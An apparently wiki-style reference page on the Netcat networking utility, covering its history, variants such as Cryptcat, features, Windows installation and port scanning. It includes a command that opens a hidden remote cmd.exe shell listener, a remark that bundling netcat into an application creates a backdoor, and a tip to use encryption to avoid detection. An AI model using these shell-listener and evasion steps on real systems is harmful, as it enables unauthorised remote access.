Netcat
Netcat has been described as "a buffed up version of telnet that has many options that allow it to do many things" and "the TCP/IP swiss army knife." Some erroneously label it a hacker's tool, while many consider it a network engineer's right hand.
An article describing Netcat usage:
The original version of netcat was written for UNIX. Another version exists which is a rewrite, called GNU netcat.
- Original UNIX netcat
- GNU netcat
- Cryptcat
- Socat
note: Unless compiled with the "GAPING_SECURITY_HOLE" flag, netcat is harmless to have on your system (as this flag is what enables netcat to execute other programs).
The most likely feature of netcat to be used as a security exploit is the ability to run as both a server and a client. It is rather simple to include netcat into any application you write then execute:
nc -l -p #port-number
and you have a backdoor in the system.
Symantec detecting Netcat as a "hack tool"
12/15/05 - Symantec is now detecting Netcat as HackTool.NetCat. The default action of Norton AntiVirus is to delete the program so be careful that it doesn't get removed. Netcat is no more an attack tool than any file transfer or remote access program. It does not exploit any vulnerability, contain any malicious code, or attempt to hide its presence. It is ironic that Symantec lists netcat on their own security tools library where it is described as, "Windows NT/9x Netcat is the port of the simple Unix utility which reads and writes data across network connections, using TCP or UDP transport protocols."
To avoid detection (if you are testing it as a backdoor) use cryptcat.
"Cryptcat is the standard netcat enhanced with twofish encryption."
netcat windows usage
- Unizip the netcat archive and extract nc.exe
- Copy nc.exe to C:\WINDOWS\System32 or C:\WINNT\System32
netcat works a lot like telnet. at the command prompt type:
nc <ip-address> <port>
Now as a server...
The following command will create a shell server on a Windows machine:
nc -L -d -p 2003 -t -e cmd.exe
This will open a MS-DOS shell when connected to at port 2003.
- -L - stay open and listen as a server
- -d - detach (don't open up a window when listening / stay hidden)
- -p - listen on the specified port
- -t - accept telnet connections
- -e cmd.exe - open up cmd.exe (the MS-DOS shell) when user is connected
port scanning
Make netcat try connecting on every port within a range:
nc -v -w 2 -z target 20-30
The -z switch prevents sending any data to a TCP connection and very limited probe data to a UDP connection, and is thus useful as a fast scanning mode just to see what ports the target is listening on. To limit scanning speed if desired, -i will insert a delay between each port probe. Even though netcat can be used for port scanning it isn’t its strength. A tool such as nmap is better suited for port scanning.
netcat encrypted
Cryptcat is the standard netcat enhanced with Bruce Schneier’s twofish encryption. Linux, OpenBSD, FreeBSD, and Windows versions are available.
cryptcat = netcat + encryption
"Cryptcat is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol while encrypting the data being transmitted. It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities."
Machine A: cryptcat -l -p 1234 < testfile Machine B: cryptcat <machine A IP> 1234
history
Hobbit (hobbit@avian.org) created netcat in 1995 as a feature-rich network debugging and exploration tool. Its purpose was to be able to create just about any type of network connection.
Some of the features of netcat are:
- Outbound or inbound connections, TCP or UDP, to or from any ports
- Full DNS forward/reverse checking, with appropriate warnings
- Ability to use any local source port
- Ability to use any locally-configured network source address
- Built-in port-scanning capabilities, with randomizer
- Built-in loose source-routing capability
- Can read command line arguments from standard input
- Slow-send mode, one line every N seconds
- Optional ability to let another program service inbound connections
Some of the potential uses of netcat:
- Script backends
- Scanning ports and inventorying services
- Backup handlers
- File transfers
- Server testing and simulation
- Firewall testing
- Proxy gatewaying
- Network performance testing
- Address spoofing tests
- Protecting X servers
- 1001 other uses you`ll likely come up with
The original version of netcat was released to run on Unix and Linux. Weld Pond (weld@l0pht.com) released the Windows NT version in 1998. The source code is available for both versions.
